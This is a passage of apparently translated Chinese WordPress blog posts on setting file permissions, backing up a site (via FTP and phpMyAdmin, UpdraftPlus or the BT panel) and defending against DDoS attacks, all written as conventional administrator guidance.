    数字中的每个数字对应于特定用户可以执行的操作:

    • 第一个数字:控制所有者可以做什么。
    • 第二位数字:控制用户中的用户帐户可以做什么。
    • 第三个数字:控制其他人可以做什么(公共)。

    权限模式中的每个数字都是分配给每个操作的数字的总和:

    • 读取: 4
    • 写入: 2
    • 执行: 1

    如果您不想授予任何权限,请使用数字0

    同样,您在权限模式中看到的数字是实体拥有的所有权限的总和。例如,如果所有者可以读取(4) 和写入(2),则权限模式将为6 (4+2)。

    或者,如果所有者拥有所有三个权限,则为7 (4+2+1)。

    因此,777是最宽松的配置。代表着:

    • 第一个数字 – 7 – 所有者可以读取(4)、写入(2) 和执行(1)
    • 第二个数字 – 7 – 组可以读取(4)、写入(2) 和执行(1)
    • 第三个数字 – 7 – 公众可以读取(4)、写入(2) 和执行(1)

    出于这个原因,您几乎永远不想在您的WordPress网站上设置任何权限为777 。我们将在下面详细讨论这一点。

    如果您想尝试一下这个想法,您可以使用chmod计算器工具来查看当您为不同的用户分配不同的权限时数字是如何变化的。

    文件权限中的字母是什么意思?

    虽然您可能最常遇到数字格式,但有时您也会看到由字母和破折号表示的文件权限。

    例如:rwxr–r–

    以下是这种格式的工作原理:

    • r = 读取权限
    • w = 写权限
    • x = 执行权限
    • (连字符)= 无权限

    总共有九个字符——前三个适用于所有者,后三个适用于组,最后三个适用于公众。

    在这种格式中,相当于777将是rwxrwxrwx.

    为什么WordPress文件权限很重要?

    由于文件权限控制不同用户可以对您服务器上的文件执行的操作,因此它们在WordPress安全性中起着至关重要的作用。

    想象一下,如果您将站点的所有文件和文件夹都设置为777。这意味着任何人都可以创建新文件、修改现有文件、删除现有文件、执行脚本等等。人们可以将恶意脚本添加到您的站点并执行它们,这将很快导致各种问题。那将是一场噩梦!

    但是,文件权限是一种平衡行为,如果您限制太多,您的网站也会停止工作。

    例如,如果您将权限设置为000,您的WordPress站点将完全停止运行,因为您的站点甚至无法读取服务器上的任何文件。

    因此,WordPress的最佳文件权限总是介于000(没有人拥有任何权限)和777(每个人都拥有所有权限)之间。

    但是,文件权限也可能很棘手,因为即使在更现实的场景中,您仍然可能会遇到问题。例如,444是您站点的.htaccess文件的一个非常安全的设置。

    但是,如果您确实这样设置,您可能会遇到一些需要能够写入您网站的.htaccess文件的插件的问题(例如WP RocketW3 Total Cache缓存插件)。

    因此,如果您正在使用需要写入权限的插件之一,您可能需要切换到稍微宽松的644甚至666,具体取决于您的 Web 服务器的配置方式。

    为什么需要更改WordPress文件权限?

    简短的回答是大多数人不需要手动更改文件权限

    如果您使用主机的自动安装程序安装了WordPress,那么作为该设置过程的一部分,任何好的主机都应该自动为您设置最佳文件权限。

    因此,如果您使用主机的自动安装程序并且您的WordPress站点运行良好,您可能不需要修改站点的文件权限。

    但是,如果您自己手动安装WordPress,则可能会出现问题。在插件安装和使用过程中,您可能还会遇到文件权限问题,例如上一节中的缓存插件示例。

    WordPress的正确文件权限

    在本节中,我们将讨论WordPress的正确文件权限。然后,如果您需要帮助,我们将在下一节中向您展示如何更改它们。

    首先,重要的是要注意最佳文件权限部分取决于您的托管环境的配置方式。对于一个环境来说是最佳和安全的,对于其他环境不一定是这样。对于使用suEXEC的共享主机尤其如此。

    一般来说,解决这个问题的一个好的经验法则是从最不许可的配置开始,并且只根据需要添加权限以使事情正常运行。例如,在谈论wp-config.php文件时,您会看到从400644的任何值。如果您不确定从哪里开始,可以从400开始,只要您认识到此设置可能会导致服务器配置出现问题,并且如果遇到问题,您可能需要使其更加宽松。

    无论如何,您都不应该将任何权限设置为777(除非您是专家并且有充分的理由这样做)。

    大多数WordPress文件/文件夹的默认文件权限

    一般来说,WordPress的正确文件权限应该如下:

    • 文件: 644
    • 文件夹: 755

    但是,有一些特殊的豁免需要注意:

    • wp-config.php文件
    • .htaccess文件
    • nginx.conf文件

    wp-config.php权限

    您站点的wp-config.php文件是一个超级敏感的文件,其中包含您站点的数据库凭据和许多其他重要信息。

    wp-config.php文件的一个很好的起点是644。但是,您会在此处找到许多其他建议,包括640600。为了更加锁定它,有些人甚至使用444。

    但是,如果您使用444,则可能会导致问题,因为许多WordPress插件依赖于wp-config.php文件的写入权限。

    .htaccess权限

    您站点的.htaccess文件是另一个值得特别注意的重要配置文件。

    .htaccess权限的一个很好的起点是644,这是WordPress Codex推荐的一些开发人员还推荐444。但是,如果您使用444,它可能会限制需要写入.htaccess文件的插件(例如大多数缓存插件)。

    注意:没有.htaccess文件,那可能是因为主机使用Nginx网络服务器来提高性能。.htaccess文件只是Apache网络服务器上的一项功能。

    nginx.conf权限

    相同的.htaccess文件权限也适用于nginx.conf,如果您的主机使用Nginx网络服务器,它是主要配置文件。

    一般地,nginx.conf文件也是使用644 。一些开发人员还推荐444

    如何快速检查WordPress文件权限

    如果您想要一种快速、非技术性的方式来检查您网站的文件权限以查看是否有任何问题,您可以使用WordPress.org上的免费iThemes Security插件。

    您还可以使用FTP或cPanel文件管理器,我们将在下一节中向您展示 – 我们首先只是共享此插件,作为检测潜在问题的快速方法。

    激活插件后,转到Security → Settings并单击File Permissions下的Show Details按钮:

    WordPress中文件权限工具的位置

    WordPress中文件权限工具的位置

    在这里,您将找到您当前的WordPress文件权限以及它们与iThemes Security推荐的文件权限的比较。您可以看到iThemes为wp-config.php文件和nginx.conf.htaccess文件推荐444 .

    但请记住,  444会导致与某些插件发生冲突,因此您可能希望避免使用它。

    现有文件权限与建议的权限设置进行比较

    WordPress中的iThemes安全功能将现有文件权限与建议的权限设置进行比较

    如果您不想在设置后继续使用该插件,我们建议您将其删除。

    如何编辑WordPress文件权限

    现在,让我们谈谈如何在需要时更改WordPress网站的文件权限。您可以使用几种不同的方法——我们将向您展示三种方法:

    • FTP
    • cPanel文件管理器
    • SSH/终端

    FTP/SFTP

    如果您知道如何使用FTP/SFTP连接到您的服务器,那么任何优质的FTP 客户端都应该让您快速更改文件权限。

    我们将向您展示它是如何使用流行的免费和开源客户端FileZilla工作的。

    使用SFTP连接到服务器后,右键单击要编辑的文件/文件夹,然后选择文件权限

    如何在FileZilla中使用FTP更改文件权限

    如何在FileZilla中使用FTP更改文件权限

    然后,您可以使用复选框或直接输入数字:

    如何使用FileZilla输入新的文件权限

    如何使用FileZilla输入新的文件权限

    cPanel文件管理器

    如果您的主机提供cPanel,您可以使用cPanel的文件管理器工具来编辑WordPress文件权限。

    在cPanel文件管理器中,右键单击要编辑的文件或文件夹,然后选择更改权限

    如何使用cPanel文件管理器更改文件权限

    如何使用cPanel文件管理器更改文件权限

    然后,选中相关框以分配权限。当你这样做时,你会在底部看到总数发生变化:

    如何使用cPanel输入新的文件权限

    如何使用cPanel输入新的文件权限

    设置正确的权限,一切顺利!

    命令行

    如果您觉得从命令行工作很舒服,您还可以使用chmod. 我们喜欢使用这个chmod计算器来快速获得适当的权限。

    小结

    正确的WordPress文件权限是创建安全、运行良好的网站的重要组成部分。但是您无需过多担心文件权限,因为如果您使用主机的自动安装工具,大多数主机都会正确配置所有内容。

    但是,如果您是手动安装WordPress,或者您的站点的原始文件权限被某些东西弄乱了,您可能需要编辑站点的文件权限。

    一般来说,WordPress目录权限应该是755,WordPress文件权限应该是644。一些重要的例外情况包括您站点的wp-config.php文件和服务器的.htaccessnginx.conf文件,您可以稍微减少对它们的允许。

    无论如何,请确保您永远不会在实时站点上将文件权限设置为777(即使您知道自己在做什么)。这样做会使您的网站和服务器面临巨大的安全漏洞。

  • 如何轻松备份WordPress网站(3种方法)

    如何轻松备份WordPress网站(3种方法)

    备份您的网站不容忽视。在许多情况下,备份您的WordPress网站可以省去很多麻烦。例如,如果您遇到导致站点中断或更新影响其功能的错误,您将能够回滚已保存的版本。

    恢复WordPress备份可以为您节省数小时的故障排除时间。另外,拥有一个意味着您可以复制您的网站或将其移至新主机。我们甚至会说,如果您没有最近的备份,则应将其添加到待办事项列表的顶部。

    在本文中,我们将准确地向您展示如何做到这一点。我们将讨论您需要备份WordPress网站的哪些部分,并向您展示三种方法,包括手动方法、使用插件及通过您的主机上的功能进行WordPress备份。

    1. WordPress网站备份简介
    2. 何时备份您的WordPress网站
    3. 如何备份WordPress网站(3种方法)

    WordPress网站备份简介

    WordPress网站不仅仅是一个简单的文件集合,您可以将这些文件从一个位置复制并粘贴到另一个位置。如果您问自己,“我需要复制哪些文件来进行WordPress站点备份?” 然后知道你的问题有两个部分的答案:

    1. 存在于WordPress目录中的所有文件
    2. 您的WordPress数据库

    WordPress根目录是您设置为您的网站提供支持的WordPress副本的文件夹。您应该通过文件传输协议 (FTP)安全外壳访问 (SSH)连接到您的服务器, 然后找到名为rootpublicpublic_html的文件夹来访问该目录。

    在某些情况下,该目录还可以包含您网站的名称:

    访问您的WordPress网站的根目录

    访问您的WordPress网站的根目录

    根目录包含从主题到插件和媒体文件的所有内容。它的一些文件包括您的网站如何与其服务器交互的规则、您添加到主题和插件中的新功能等等。

    简而言之,该目录包含使WordPress工作的所有文件。但是,您实际网站的内容驻留在唯一的数据库中。您在下面看到的每个表都存储了WordPress站点的数据:

    一个WordPress数据库及其表

    一个WordPress数据库及其表

    备份数据库涉及导出所有这些表(通常为SQL格式)。然后您导入该文件的内容,您的数据库软件将覆盖现有值。

    如果这还没有多大意义,请不要担心。我们将在以下部分之一中向您展示如何手动备份WordPress网站。如果您不喜欢弄乱数据库或手动复制文件的想法,请使用备份WordPress站点插件。

    本质上,WordPress备份插件会创建站点文件及其数据库的副本(一起或单独)。然后这些插件使您能够选择要“恢复”的备份文件。这意味着用备份文件中的文件和数据库表覆盖现有文件和数据库表。

    如果您使用信誉良好的网络主机,它可能还提供自动站点备份。此功能意味着您不必担心手动创建备份或使用插件,因为您的网络主机会为您完成。它还应该将这些备份存储一段时间以备不时之需。

    何时备份您的WordPress网站

    简短的回答是您应该始终对您的网站进行最近的备份。想象一下今天遇到了一个破坏站点的错误,却不知道如何解决它。

    如果你有一个一天或更短的备份,你可能会没事的。但是,如果它是一周前的,它可能不包括您网站的一些最新更新。一个多月,它可能会丢失您在此期间所做的重要更改。

    问问自己,在不对网站产生负面影响的情况下,您认为可能会丢失多少最近的数据。如果您运行静态站点,偶尔备份应该没问题。但是,对于论坛、在线商店、博客和大多数大型网站,一致的备份是必要的:

    最近的网站备份列表

    最近的网站备份列表

    如果您四处寻找网络托管服务,您会注意到其中许多将每日备份作为重要卖点。如果您选择WordPress托管,您应该至少收到每日备份。

    这似乎有点矫枉过正,但如果它能让您避免丢失一次关键数据,那么增加的价格肯定是值得的——这通常可以忽略不计。许多WordPress插件还使您能够安排备份,如果您使用不包含备份功能的预算共享主机作为交易的一部分,这可以派上用场。

    这给我们带来了手动备份WordPress的显着缺点:您无法自动化该过程。对于如此重要​​的事情,我们建议采用简化的方法,以最大程度地减少某人忘记备份甚至错误丢失一些文件的机会。

    最后一个警告是,在对其进行重大更改、将其移动到新主机或更改站点的域之前,您应该始终备份整个站点。如果您曾经问​​过自己,“如何在更新之前备份我的 WordPress 网站?” 然后继续阅读以下部分以找到最适合您的方法。

    如何备份WordPress网站(3种方法)

    既然我们已经介绍了备份网站的重要性,现在是时候探索如何去做了。让我们看看如何使用四种方法备份WordPress网站。

    1. 如何手动备份WordPress网站

    正如我们之前提到的,备份WordPress网站涉及复制其所有文件并导出其数据库的内容。您可以使用FileZilla等文件传输协议 (FTP) 客户端执行这两项任务中的第一项。

    您的网络主机应为您提供一组凭据,您可以使用这些凭据通过FTP或在我们的示例中为SFTP连接到您的网站。

    使用这些凭据,您将能够连接到您的服务器并找到您的WordPress根目录。在许多情况下,该目录称为public 要开始,请继续复制或下载整个文件夹:

    下载WordPress根目录

    下载WordPress根目录

    下载可能需要一段时间,因为大多数WordPress网站都包含数百或数千个文件。备份完成后,我们建议您将该文件夹重命名为备份日期,然后将其存储在安全位置。它可以让您将整个WordPress网站(包括所有媒体)保存在您的PC或云存储解决方案中。

    这就回答了“如何使用FTP 备份我的WordPress网站?”这个问题。— 这给我们留下了您的数据库。备份该元素的最简单方法是转到您的主机控制面板并查找您的数据库管理软件。

    您需要进入您网站对应的数据的phpMyAdmin它将启动数据库管理器。从左侧菜单中选择您网站的数据库,您应该会看到如下表的列表:

    phpMyAdmin中的WordPress数据库表

    phpMyAdmin中的WordPress数据库表

    接下来,在屏幕顶部的菜单中选择ExportphpMyAdmin会询问您要使用哪种导出方法。Quick选项将自动将您站点的所有表包含在SQL文件中,这正是我们想要的。

    确保在Format下选择SQL 然后单击Go

    从phpMyAdmin导出您网站的表格

    从phpMyAdmin导出您网站的表格

    您的数据库文件应立即下载。而已!

    在这个阶段,您拥有WordPress根目录及其数据库的副本。您可以将站点目录和数据库SQL文件压缩在一起,以备不时之需。

    恢复您的手动备份

    如果您需要恢复手动备份,最好的方法是将备份根文件夹以不同的名称上传到您的服务器(与当前服务器处于同一级别)。目录启动后,您可以删除当前的根文件夹并将备份重命名为其原始值。

    之后,是时候恢复您的数据库备份了。为此,请返回 phpMyAdmin 并找到您站点的数据库。这一次,选择屏幕顶部的Import选项。

    phpMyAdmin将要求您选择要导入的文件并指定其格式:

    通过phpMyAdmin导入数据库文件

    通过phpMyAdmin导入数据库文件

    选择要导入的数据库备份文件,然后单击屏幕底部的执行。导入过程完成后,您将看到一条成功消息。

    在这个阶段,如果您访问您的网站,您的备份将替换其最新版本。如果您恢复备份以解决您的网站问题,它现在应该可以正常工作。

    2. 如何使用备份WordPress插件

    您可以使用很多WordPress备份插件。但是,我们可以将它们分为两大类:

    1. 全站点备份插件:这种类型的插件会生成您网站的完整副本并将其保存以备不时之需。
    2. 增量备份插件:该系列插件仅在您对网站进行更改时生成备份,因此您可以避免占用不必要的服务器存储空间。

    这两种插件的另一个区别是增量备份工具往往要花钱。但是,您可以使用许多免费的全站点备份工具。

    如果您对增量备份插件感兴趣,我们在之前的博客文章中提供了我们最喜欢的备份插件列表。在本节中,我们将向您展示如何使用最流行的免费解决方案之一UpdraftPlus

    UpdraftPlus插件

    UpdraftPlus插件

    大多数WordPress备份插件的工作方式类似,这意味着如果您知道如何使用其中一个,您应该能够找到解决其他同类工具的方法。UpdraftPlus也不例外,您可以使用它在几分钟内创建完整的站点备份。

    要开始使用,请安装并激活插件,然后转到WordPress仪表板中的设置> UpdraftPlus Backups。接下来,单击Backup Now按钮:

    使用UpdraftPlus创建WordPress站点备份

    使用UpdraftPlus创建WordPress站点备份

    如您所见,UpdraftPlus还提供增量备份。但是,该功能仅适用于插件的高级版本,因此我们将在本教程中忽略它。

    单击该按钮后,UpdraftPlus将询问您希望将网站的哪些部分包含在备份中。默认情况下,它们同时拥有您网站的文件及其数据库:

    选择要包含在WordPress备份中的元素

    选择要包含在WordPress备份中的元素

    点击窗口底部的确认按钮,等待插件生成您的备份文件。现在,如果您向下滚动到Existing backups部分,您将看到您最近的备份(现在应该只有一个):

    您现有的WordPress站点备份的列表

    您现有的WordPress站点备份的列表

    UpdraftPlus使您能够单独下载任何备份文件组件,例如其插件、主题、上传文件甚至数据库。您还可以通过单击相应的按钮来删除或恢复备份。

    恢复您的UpdraftPlus备份

    恢复UpdraftPlus备份是一件简单的事情。该插件会询问您要恢复哪些组件,您应该选择所有组件:

    恢复UpdraftPlus WordPress备份

    恢复UpdraftPlus WordPress备份

    您需要确认要继续还原备份。完成后,插件将负责其余的工作。该过程完成后,您的站点将返回到之前的版本。

    简而言之,这就是大多数WordPress备份插件的工作方式。但是,大多数免费工具缺少的一项功能是安排WordPress站点备份,其中使用了以下方法。

    3. 如何通过主机备份您的WordPress网站

    如果您使用信誉良好的网络主机或者通过宝塔管理服务器,它应该为您提供自动备份。但是,这些备份的频率可能会有所不同。例如,在 宝塔面板,您可以跟进实际需要设置每天甚至每小时的自动备份,您可以通过登录您的托管仪表板来访问这些备份。

    但是,这不是我们提供的唯一备份类型。在以下部分中,我们将向您展示如何访问您的自动备份。

    如何通过宝塔面板执行网站文件或数据库备份

    在宝塔面板,您可以设置WordPress备份计划。但是,在进行任何重大更改之前创建手动备份仍然是明智之举。要创建此安全网,请登录您的宝塔仪表盘。然后,单击左侧的“网站”菜单,找到你需要备份的网站对应的备份操作,然后在弹窗中点击“备份站点”。

    在宝塔面板执行网站备案操作

    在宝塔面板执行网站备案操作

    接下来,进行网站数据库备份,选择数据库菜单项。找到你需要备份的站点对应的数据库,点击备份列对应的操作项,然后单击弹窗的备份数据库按钮。

    备份网站数据库

    备份网站数据库

    您也可以通过宝塔面板的计划任务,来创建备份网站或者备份数据库任务,可以设置执行周期,对您的网站文件和数据库按周期定期备份,这是一个非常方便的功能。

    宝塔面板计划任务

    小结

    学习如何备份WordPress网站比您想象的要容易。您可以手动执行此操作,使用插件,甚至让您的虚拟主机负责整个过程。

    WordPress站点备份的最简单和最安全的方法是使用自动化它们的托管服务提供商。在宝塔,我们还可以实现WordPress备份自动化任务。

  • 什么是DDoS攻击及应如何应对

    什么是DDoS攻击及应如何应对

    DDoS攻击非常容易实施,每年都会影响全球数百万个网站,而且攻击数量还在不断增加。

    遭受DDoS攻击似乎是上网不可避免的副作用;您的网站越成功,您就越有可能在某个时候成为攻击的目标。但是您可以减少DDoS攻击影响您的站点的机会。

    您可能想知道:什么是DDoS攻击?我怎样才能保护我的网站免受他们的侵害?

    任何经营任何类型的在线企业的人都应该警惕DDoS攻击。或者分布式拒绝服务攻击。这基本上是说有人想要关闭您的网站或服务,因此他们从各个点发送大量流量来淹没您,并使您难以关闭甚至追踪攻击的来源。它们使您的服务器成为瓶颈,因此您的普通访客被拒绝提供服务。这是在线状态可能发生的最琐碎和最令人沮丧的事情之一。

    在这篇文章中,我们将解释什么是DDoS攻击,探索可能使您的网站易受攻击的原因,并概述可以降低其概率和影响的方法。

    1. 什么是DDoS攻击?
    2. 为什么有人会对您的网站进行DDoS攻击?
    3. DDoS攻击的影响
    4. 什么会使您的网站容易受到DDoS攻击?
    5. 如何保护您的网站免受DDoS攻击

    什么是DDoS攻击?

    让我们首先检查一下DDoS攻击是什么,重要的是,它不是什么。

    DDoS代表分布式拒绝服务,但通常被称为简单的拒绝服务。DDoS攻击包括网站在短时间内被请求淹没,目的是使网站不堪重负并导致其崩溃。“分布式”元素意味着这些攻击同时来自多个位置,而DoS仅来自一个位置。

    大多数DDoS攻击是由僵尸网络执行的,僵尸网络是“一组被恶意软件感染并处于恶意用户控制之下的计算机”。然后这些机器被劫持并用于攻击攻击者想要拒绝服务的任何服务。

    虽然构成僵尸网络的计算机被恶意软件感染,但请务必注意,如果您的WordPress网站受到DDoS攻击,则您的网站并未感染恶意软件。DDoS只是阻止正常流量到达您的身边。但是,如果您的计算机已经受到安全漏洞的危害,您的服务器可能会成为僵尸网络的一部分,对其他人进行DDoS攻击。

    如果您的站点遭受DDoS攻击,您将在几分钟甚至几小时内收到来自多个来源的数千个请求。这些请求并不是网站突然流量激增的结果:它们是自动化的,并且来自有限数量的来源,具体取决于攻击的规模。

    在下面的屏幕截图中,您可以看到在DDoS攻击期间站点收到的请求突然激增。

    DDoS攻击流量

    DDoS攻击流量

    DDoS攻击与黑客攻击不同,尽管两者可以联系起来;肇事者并没有试图访问您网站的文件或管理员,而是由于请求量大而导致网站崩溃或易受攻击。在某些情况下,随后会在网站易受攻击时尝试入侵该网站,但在大多数情况下,目的只是让网站停止工作。

    听起来好像没有任何方法可以避免DDoS攻击:毕竟,如果有人决定用请求淹没您的站点,那么您无法阻止他们。

    但是,尽管您无法阻止有人试图通过DDoS攻击破坏您的网站,但您可以采取一些步骤来确保如果您受到攻击,您的网站不会停止工作并且不会停止工作容易受到黑客攻击。

    DDoS不是黑客攻击

    正如我们上面所说,DDoS攻击并不是试图利用漏洞来访问您的站点。这更像是蛮力攻击。那是特定方试图通过重复登录尝试和密码重置(委婉地说)来进入您的站点的时候。

    DDoSers不会试图获取您的密码、接管您的网站、安装恶意软件或将您的计算机用于不法手段。如果您受到DDoS攻击,您将被拒绝提供服务。没有人需要访问您的服务器,因为他们正在通过公共渠道轰炸它。不是像黑客入侵和蛮力攻击那样的后端。

    为什么您成为DDoS目标?

    为什么会有人这样对你?嗯,最常见的一个想法是黑客行动主义,其中一方希望阻止他们反对的想法或服务​​的传播。这可能出于多种原因,但如果您发布的内容可能引起分歧,黑客行动主义者可能会对您进行DDoS攻击。

    众所周知,企业间谍活动会发生,例如,在大型销售或一年中的某个时候,竞争对手将您关闭,以将更多利润转移给他们自己。或者可能是有人想要学习网络安全和DDoS攻击的来龙去脉。也许只是某个地方无聊的人认为这很有趣并想看着世界燃烧。(这种情况发生在PlayStation Network或Xbox Live或魔兽世界等在线游戏和服务中)。

    如果您看不到自己成为黑客行动主义者或公司破坏的目标,那么您可能只是想要对陌生人造成一些破坏的人的不幸目标。

    我们将在本文后面介绍这些步骤,但首先,让我们检查一下为什么有人可能想要在您的站点上发起DDoS攻击。

    为什么有人会对您的网站进行DDoS攻击?

    那么为什么有人会在您的WordPress网站上发起DDoS攻击呢?他们能从中得到什么?

    攻击者可能希望通过DDoS攻击使您的站点停止运行的原因有很多。这些包括竞争对手的攻击和因您的内容而受到的攻击。

    竞争对手的DDoS攻击

    在一个理想的世界里,你的竞争对手会试图通过改进他们的内容、搜索引擎优化和转化率来超越你,这是使用你的网站获得竞争优势的合法方式。

    但在某些情况下,竞争对手可能会采取更极端的措施。竞争对手可能会雇用某人在您的网站上发起DDoS攻击,因为他们知道这不仅会影响您的网站,还会影响您的业务。

    在您让您的网站重新运行所需的时间里,他们会从您那里抢走业务,尤其是当他们使用您的公司名称作为关键字投放广告时。如果您的网站没有快速重新启动和运行,您将失去搜索排名,并且可能会发现您的竞争对手现在在Google上的排名高于您。

    当然,很难证明谁实施了任何DDoS攻击。攻击不会来自竞争对手的IP地址!除非您财力雄厚,否则试图对您怀疑这样做的竞争对手采取法律行动不太可能成功。

    首先保护自己免受攻击的影响要好得多。并且不要试图对您的竞争对手发起另一次DDoS攻击作为回应。这是非法的,最好向自己保证,一个拼命使用此类措施的竞争对手可能不会像您的企业那样长寿或享有盛誉。

    对您的内容的DDoS攻击

    一些网站因其内容的性质而受到DDoS攻击。

    例如,举报网站可能会受到攻击。处理有争议的问题(例如获得堕胎或反种族主义)的网站可能会受到不同意其信息并希望使其停止运行的人的攻击。或者您的内容可能是商业的,但仍然很敏感,并且有些人不希望它在网上可用。

    如果您的网站被成功攻击,它将使您的内容无法流通,如果您的用户需要访问信息或指导,这可能会给他们带来问题。

    您还将花时间解决问题,失去您可能从该网站获得的任何收入(如果您是非营利组织,则可能是销售或捐赠),如果您的网站在数小时内或好几天天返回502错误

    出于政治动机的DDoS攻击

    随着网络威胁越来越多地被用来破坏政治进程,出于政治动机的DDoS攻击变得越来越普遍。

    如果您的网站是为政党、候选人或组织服务的,或推进特定的政治事业,那么它可能容易受到不同意您的政治观点的人的攻击。

    这不会不必要地来自你的政治对手。它更有可能来自寻求破坏政治辩论、阻止某些类型的内容并利用混乱来迷惑和剥夺人们权利的外部来源。

    攻击可能是试图使人们无法访问您的内容(见上文),也可能是对网站背后的个人候选人或组织的更加个人化的攻击。

    这与由于新闻周期导致访问量激增而导致网站超载不同。我曾经在一个政党的网站上工作,当该党的竞选宣言发布以进行大选时,该网站变得不堪重负。那是英国第一次选举,其中电子竞选很重要,我们只是没有为交通量做好准备。

    相反,DDoS攻击会更加尖锐和突然,有时会在几分钟内看到请求的突然激增。这看起来与流量的自然高峰非常不同,虽然它可能是突然的,但通常会采用曲线而不是悬崖的形式。

    如果您正在开展一项活动(由于额外的宣传,这可能使您更容易受到攻击),那么确保您的网站保持正常运行并且在您可能专注于活动活动时不要浪费时间处理攻击将尤为重要. 这就是为什么采取以下步骤来保护您的网站免受出于政治动机的DDoS攻击至关重要的原因。

    DDoS攻击的影响

    DDoS攻击可能会产生多种影响,具体取决于攻击的性质以及您对此的准备程度。

    1. 网站停机时间

    最直接和最明显的影响是您的网站不堪重负,变得不可用。

    这意味着您通过您的网站获得的任何业务在您让网站重新运行之前都将无法使用。它还会影响您作为网站所有者的声誉。如果您不快速修复该网站,它可能会影响您的SEO,就像Google抓取您的网站并发现它无法运行一样,您将失去排名。

    如果您的网站由于超载而无法使用,它将返回502 bad gateway错误,如果您允许它保持这种状态太久,这将对您的搜索排名产生负面影响。

    我还看到了网站在几天内无法使用的攻击(因为所有者不知道如何修复它并且没有保留备份,很快就会有更多备份),以及网站何时可用重新上线,该网站的Google列表中的所有内部链接都已丢失。

    2. 服务器和托管问题

    如果您的网站经常受到您未采取措施缓解的攻击,这可能会导致您的托管服务提供商出现问题。

    一个好的托管服务提供商会为您提供工具来保护您的网站免受DDoS攻击,但如果您没有此工具并且您使用的是共享托管服务,那么攻击可能会影响同一服务器上的其他网站。

    3. 网站漏洞

    DDoS攻击可能会使您的网站更容易受到黑客攻击,因为您的所有系统都专注于让网站重新上线,而安全系统可能已因攻击而无法运行。

    一旦DDoS攻击成功使您的网站瘫痪,黑客可能会发现更容易通过后门进入您的网站。

    像这样的后续攻击并不总是来自与构成DDoS攻击的请求相同的来源:聪明的黑客会知道如何隐藏他们的踪迹并使用多个IP地址来攻击您的站点,以及如何隐藏他们的真实位置。

    因此,如果您是DDoS攻击的受害者,您的首要任务之一应该是确保您的WordPress网站是安全的。这可以说比让您的面向公众的网站重新启动并运行更重要,因为另一次攻击只会让您回到原点(或更糟)。

    4. 浪费时间和金钱

    修复遭受DDoS攻击的网站需要时间。也需要钱。

    如果您不知道您的站点发生了什么并且没有为攻击的可能性做好准备,您最终可能不得不从头开始重建您的站点(我已经看到发生这种情况的站点)。如果你没有备份你的网站,你打算从什么地方恢复它?如果您不快速修复它,攻击可能会对您网站的SEO和业务绩效产生长期影响。

    当网站关闭时,您可能会损失收入,尤其是当您的网站是电子商务商店时。而且您可能需要花钱聘请安全专家或网络信封人员来重建您的网站,并确保它免受未来的攻击。

    所有这些都强调了保护您的站点免受DDoS攻击的重要性。我有一位客户由于其业务性质而经常遭受攻击未遂;因为我们设置了安全措施,所以这些措施从未对网站产生影响。如果您准备好了,那么DDoS攻击也不应该影响您的站点。

    什么会使您的网站容易受到DDoS攻击?

    一些站点比其他站点更容易受到DDoS攻击。这些将使您更容易受到攻击或其后遗症的影响。

    廉价托管

    与各种网络攻击一样,DDoS攻击易受攻击的第一个罪魁祸首是廉价托管。

    廉价托管有两个主要缺点:缺乏支持和客户数量。

    为了以如此低廉的价格提供托管服务,托管服务提供商将拥有大量使用同一服务器的客户端,这意味着如果该服务器上的其他站点之一受到攻击,它可能会影响您。

    廉价的托管服务提供商不会提供针对DDoS攻击的安全预防措施,它们不会在攻击发生时向您发出警告,也不会在站点停止工作时帮助您修复站点。他们不会对您的网站进行定期备份,即使他们这样做,他们也不太可能帮助您恢复您的网站:您必须自己弄清楚如何做。

    这并不是因为廉价的托管服务提供商试图欺骗您,也不是因为他们没有提供他们承诺的服务:这仅仅是因为为了让他们的托管服务便宜,他们不得不吝啬支持。否则,他们不会盈利。

    如果您的网站支持您的声誉和网站安全性很重要的企业或任何企业,那么投资优质托管是值得的。如果您避免在网站受到攻击时花时间修复您的网站,那么额外的费用将是值得的,如果这意味着您的网站通过尝试的 DDoS 攻击保持在线并且没有受到损害,那么这当然是值得的。

    缺乏准备

    未能为DDoS攻击的可能性做好准备并不一定能阻止这种攻击的发生,但这意味着如果您受到攻击,您就不会遭受太多痛苦。

    首先,针对潜在攻击采取安全预防措施将提高您的网站在遭受未遂攻击的情况下仍保持在线的机会。

    但了解如何阻止DDoS攻击也将有所帮助。如果您的站点受到攻击并且如果您已做好准备而确实出现故障,那么您将能够比您没有做好准备时更快地重新启动并运行它。

    安装安全软件或使用您的托管服务提供商提供的安全警报意味着如果您的网站确实受到攻击,您将收到警报,您或您的托管服务提供商都可以采取措施保护您的网站。

    定期备份您的站点意味着您可以在遇到问题时快速恢复它。

    使您的站点保持最新意味着它本质上更安全,并且如果您必须重建它,则不太可能遇到问题。

    不安全或过时的代码

    使您的WordPress版本以及主题和插件保持最新状态并不能保护您免受DDoS攻击。

    但是,如果您受到攻击并且您网站的后续弱点被黑客用作获得不必要访问的机会,那么如果您的网站管理良好,他们成功的可能性将大大降低。

    预防措施包括使您的网站保持最新以及仅安装来自信誉良好的来源的插件和主题。到目前为止,WordPress 主题和插件目录是查找免费主题和插件的最佳场所,信誉良好的开发人员将在那里提供它们。小心不要安装可能导致与您的主机不兼容的代码,也 不要安装无效的主题或插件

    如何保护您的网站免受DDoS攻击

    无论您可能成为DDoS攻击目标的原因是什么,您都应该采取预防措施以防止它发生在您和您的WordPress网站上。保护您的WP安装免受拒绝服务攻击与防止其他攻击没有什么不同。至少从你的角度来看。底层保护的工作方式大不相同。但是作为WordPress用户,您很幸运能够将其留给开发人员和专家,并从他们的辛勤工作和专业知识中获得回报。

    那么现在对于您一直渴望知道答案的问题:您如何保护您的站点免受DDoS攻击?

    您可以采取多种预防措施,具体选择取决于您的设置、预算和偏好。

    定期更新WordPress

    这应该是显而易见的,不用说。但我们想说。确保您的WordPress安装是最新的。如果您仍在使用5.7版本,而最新版本是5.8,那么您不仅会让入侵者访问您的网站,而且还会受到DDoS攻击。至少是间接的。如果您保持WP更新,您可以使用最新版本的安全插件,此外您还修补了任何安全漏洞,以防止您的服务器被感染并被纳入DDoS僵尸网络。

    使用安全插件

    WordFence、iThemes、Sucuri和许多其他免费选项可确保您的WordPress安装安全。充分利用它们。最重要的是,您需要安装WAF。代表Web应用程序防火墙,WAF是您抵御传入僵尸网络的最佳防御。

    通常,防火墙会在您的服务器周围设置一个边界,并确定哪些人可以进入,哪些人不能进入。规则(称为策略)适用于黑名单或白名单优先级。WAF开发人员和团队阻止(或列入黑名单)已知僵尸网络、它们的区域和 IP。这可以保护您的站点免受已知威胁的侵害,但如果其他地方出现新威胁,您可能仍然处于危险之中。

